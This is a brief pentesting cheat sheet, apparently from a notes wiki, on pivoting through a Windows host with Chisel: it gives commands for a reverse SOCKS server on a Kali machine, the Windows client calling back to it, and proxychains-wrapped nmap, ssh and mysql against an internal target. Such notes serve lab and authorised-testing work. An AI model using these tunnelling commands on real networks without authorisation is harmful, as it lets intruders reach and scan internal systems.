Windows: Chisel
What is Chisel?
Usage
Reference
Last updated
Last updated
socks5 127.0.0.1 1080chisel server --port 8000 --socks5 --reverse.\chisel.exe client --max-retry-count 1 <kali_ip>:8000 R:socksproxychains -q nmap -sC -sV <target_ip>
proxychains -q ssh <username>@<target_ip>
proxychains -q mysql -u <username> -h <target_ip>